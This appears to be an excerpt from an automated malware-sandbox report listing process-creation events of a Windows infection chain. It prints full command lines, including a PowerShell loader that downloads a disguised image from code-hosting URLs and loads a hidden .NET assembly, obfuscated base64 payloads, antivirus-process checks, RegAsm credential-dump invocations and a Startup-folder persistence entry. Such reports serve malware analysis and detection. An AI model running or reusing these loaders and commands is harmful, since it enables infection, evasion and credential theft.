                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXEProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 603423
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "speechesdjexpandingsoviet" Controllers
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Southampton + ..\Transition + ..\Mars + ..\Paying + ..\Clay + ..\Usually + ..\Fighters + ..\Disposition + ..\Models + ..\Semester s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif Lucas.pif s
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP001.TMP\one.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yzbzlbqtwhlotogkfeks"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ilkgo.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr" "C:\Users\user\AppData\Local\DesignInno Innovations\H"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] (' txt.crijfkf/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#gc#z#bm#gy#zgbm#gy#zgbm#gy#lwbk#gq#z#bk#gq#lwbk#g8#dwbu#gw#bwbh#gq#cw#v#gk#bqbn#f8#d#bl#hm#d##u#go#c#bn#d8#mq#x#dg#mq#x#dc#mw#1#cc#l##g#cc#a#b0#hq#c#bz#do#lw#v#hi#yqb3#c4#zwbp#hq#a#b1#gi#dqbz#gu#cgbj#g8#bgb0#gu#bgb0#c4#ywbv#g0#lwbz#ge#bgb0#g8#bqbh#gw#bw#v#ge#dqbk#gk#d##v#g0#yqbp#g4#lwbp#g0#zwbf#hq#zqbz#hq#lgbq#h##zw#/#de#n##0#dq#mq#3#di#mw#n#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#i##9#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i##k#gw#aqbu#gs#cw#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#gk#zg#g#cg#j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##lqbu#gu#i##k#g4#dqbs#gw#kq#g#hs#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c##pq#g#fs#uwb5#hm#d#bl#g0#lgbu#gu#e#b0#c4#rqbu#gm#bwbk#gk#bgbn#f0#og#6#fu#v#bg#dg#lgbh#gu#d#bt#hq#cgbp#g4#zw#o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bz#hq#yqby#hq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#fm#v#bb#fi#v##+#d4#jw#7#c##j#bl#g4#z#bg#gw#yqbn#c##pq#g#cc#p##8#ei#qqbt#eu#ng#0#f8#rqbo#eq#pg#+#cc#ow#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#cwb0#ge#cgb0#ey#b#bh#gc#kq#7#c##dq#k#c##i##g#c##i##g#c##i##g#c##i##g#cq#zqbu#gq#sqbu#gq#zqb4#c##pq#g#cq#aqbt#ge#zwbl#fq#zqb4#hq#lgbj#g4#z#bl#hg#twbm#cg#j#bl#g4#z#bg#gw#yqbn#ck#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#c0#zwbl#c##m##g#c0#yqbu#gq#i##k#gu#bgbk#ek#bgbk#gu#e##g#c0#zwb0#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#ck#i#b7#c##j#bz#hq#yqby#hq#sqbu#gq#zqb4#c##kw#9#c##j#bz#hq#yqby#hq#rgbs#ge#zw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] (' txt.mpcfsnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innocraft.url" & echo url="c:\users\user\appdata\local\designinno innovations\innocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innocraft.url" & exit
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq